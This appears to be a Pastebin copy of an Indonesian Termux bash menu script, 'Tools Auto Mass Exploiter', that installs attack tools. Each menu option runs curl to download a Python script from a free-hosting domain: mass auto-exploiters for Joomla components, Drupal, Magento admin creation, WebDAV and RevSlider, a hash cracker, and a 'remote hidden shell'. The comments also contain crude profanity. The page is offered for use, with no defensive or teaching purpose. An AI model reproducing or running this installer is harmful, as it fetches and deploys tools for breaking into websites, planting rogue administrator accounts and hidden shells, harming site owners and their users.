Advertisement
Guest User

Tools Auto Mass Exploiter - Mr.Rm19

a guest
Jul 2nd, 2019
1,041
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.62 KB | None | 0 0
  1. #!/data/data/com.termux/files/usr/bin/bash
  2. # JANGAN GANTI COPYRIGHT ASLI NGENTOT!!!
  3. # Copyright Mr.Rm19
  4. # GAUSH RECODE ANJING Gabisa bikin kreasi sendiri ya?
  5. # DSR ScriptKiddies
  6. clear
  7.  
  8. blue='\e[0;34'
  9. cyan='\e[0;36m'
  10. green='\e[0;34m'
  11. okegreen='\033[92m'
  12. lightgreen='\e[1;32m'
  13. white='\e[1;37m'
  14. red='\e[1;31m'
  15. yellow='\e[1;33m'
  16.  
  17. ###################################################
  18. # CTRL C
  19. ###################################################
  20. trap ctrl_c INT
  21. ctrl_c() {
  22. clear
  23. echo -e $red"[#]> (Ctrl + C ) Detected, Trying To Exit ... "
  24. sleep 1
  25. echo ""
  26. echo -e $green"[#]> Terima kasih sudah make tools saya ... "
  27. sleep 1
  28. echo ""
  29. echo -e $white"[#]> Mr.Rm19 in here!!!!! ... "
  30. read enter
  31. exit
  32. }
  33.  
  34. echo -e $red"
  35. __________  __        __
  36. /_  __/ __ \/ /  ___  / /  ___ _______
  37. / / / /_/ / /__/ _ \/ /__/ -_) __(_-<  author : Mr.Rm19
  38. /_/  \____/____/\___/____/\__/_/ /___/ ramdan19id@gmail.com
  39. 008 - c4uR - Mrs.4ul14 - k4m1hax0r - ./Serizawa
  40. "
  41. echo ""
  42. echo -e $green" 01) Com Fabrik Auto exploiter"
  43. echo -e $green" 02) Com Fox contact Auto exploiter"
  44. echo -e $green" 03) Download File Apapun with c++"
  45. echo -e $green" 04) Hashkiller"
  46. echo -e $green" 05) Auto exploit drupal"
  47. echo -e $green" 06) CBT Auto exploiter"
  48. echo -e $green" 07) Magento add admin auto exploiter"
  49. echo -e $green" 08) Webdav mass auto exploiter"
  50. echo -e $green" 09) Remote hidden shell"
  51. echo -e $green" 10) Revslider auto exploiter"
  52. echo -e $green" 11) Com sexy auto exploiter"
  53. echo -e $white""
  54. read -p "[root@Mr.Rm19:~#]>" Rm19;
  55.  
  56. if [ $Rm19 = 01 ] || [ $Rm19 = 01 ]
  57. then
  58. clear
  59. echo -e $green" installing com fabrik..."
  60. sleep 1
  61. apt update && apt upgrade
  62. pkg install python2
  63. pip2 install requests
  64. pip2 install urllib
  65. pip2 install sys
  66. curl -O https://schooldep.000webhostapp.com/tololers/fabrik.py
  67. echo -e $green" Sukses!"
  68. echo -e $green" cara pakai : python2 fabrik.py"
  69. fi
  70.  
  71. if [ $Rm19 = 02 ] || [ $Rm19 = 02 ]
  72. then
  73. clear
  74. echo -e $green" installing com foxcontact"
  75. pkg install python2
  76. curl -O https://schooldep.000webhostapp.com/tololers/contact.py
  77. echo -e $green" Sukses!"
  78. echo -e $green" cara pakai : python2 contact.py"
  79. fi
  80.  
  81. if [ $Rm19 = 03 ] || [ $Rm19 = 03 ]
  82. then
  83. clear
  84. echo -e $green" Installing Downloader "
  85. sleep 1
  86. apt update && apt upgrade
  87. pkg install clang
  88. pkg install git
  89. git clone https://github.com/Rmdn19id/downloader
  90. echo -e $green" done! "
  91. echo -e $green" cara gunakan : cd downloader"
  92. echo -e $green" g++ ramdanganteng.cpp -o ramdanganteng.exe"
  93. fi
  94.  
  95. if [ $Rm19 = 04 ] || [ $Rm19 = 04 ]
  96. then
  97. clear
  98. echo -e $green" installing hashkiller"
  99. sleep 1
  100. pkg install python2
  101. pip2 install requests
  102. curl -O https://schooldep.000webhostapp.com/tololers//hashkiller.py
  103. echo -e $green"Sukses! "
  104. echo -e $green"cara pakai : python2 hashkiller.py"
  105. fi
  106.  
  107. if [ $Rm19 = 05 ] || [ $Rm19 = 05 ]
  108. then
  109. clear
  110. echo -e $green" instaling auto exploit drupal"
  111. sleep 1
  112. pkg install python2
  113. pkg install python
  114. curl -O https://schooldep.000webhostapp.com/tololers/drupal.py
  115. echo -e $green"Sukses!"
  116. echo -e $green" cara pakai : python2 drupal.py"
  117. fi
  118.  
  119. if [ $Rm19 = 06 ] || [ $Rm19 = 06 ]
  120. then
  121. clear
  122. echo -e $green" installing cbt auto exploit"
  123. sleep 1
  124. pkg install python2
  125. curl -O https://schooldep.000webhostapp.com/tololers/cbt.py
  126. echo -e $green"Sukses!"
  127. echo -e $green" cara pakai : python2 cbt.py"
  128. fi
  129.  
  130. if [ $Rm19 = 07 ] || [ $Rm19 = 07 ]
  131. then
  132. clear
  133. echo -e $green" installing magento add admin "
  134. sleep 1
  135. pkg install python2
  136. curl -O https://schooldep.000webhostapp.com/tololers/magentoadd.py
  137. echo -e $green"Sukses!"
  138. echo -e $green" cara pakai : python2 magentoadd.py"
  139. fi
  140.  
  141. if [ $Rm19 = 08 ] || [ $Rm19 = 08 ]
  142. then
  143. clear
  144. echo -e $green" instaling webdav mass exploiter"
  145. sleep 1
  146. pkg install python2
  147. curl -O https://schooldep.000webhostapp.com/tololers/webdav.py
  148. echo -e $green"Sukses!"
  149. echo -e $green" cara pakai : python2 webdav.py"
  150. fi
  151.  
  152. if [ $Rm19 = 09 ] || [ $Rm19 = 09 ]
  153. then
  154. clear
  155. echo -e $green" instaling remote hiden shell"
  156. sleep 1
  157. pkg install python2
  158. curl -O https://schooldep.000webhostapp.com/tololers/remoteshell.py
  159. echo -e $green"Sukses!"
  160. echo -e $green" cara pakai : python2 remoteshell.py"
  161. fi
  162.  
  163. if [ $Rm19 = 10 ] || [ $Rm19 = 10 ]
  164. then
  165. clear
  166. echo -e $green" instaling revslider exploiter "
  167. pkg install python
  168. curl -O https://schooldep.000webhostapp.com/tololers/revslider.py
  169. echo -e $green"SukSes!"
  170. echo -e $green" cara pakai : python revslider.py"
  171. fi
  172.  
  173. if [ $Rm19 = 11 ] || [ $Rm19 = 11 ]
  174. then
  175. clear
  176. echo -e $green" instaling com sexy"
  177. pkg install python2
  178. curl -O https://schooldep.000webhostapp.com/tololers//comsexy.py
  179. echo -e $green" Sukses!"
  180. echo -e $green" cara pakai : python2 comsexy.py"
  181. fi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement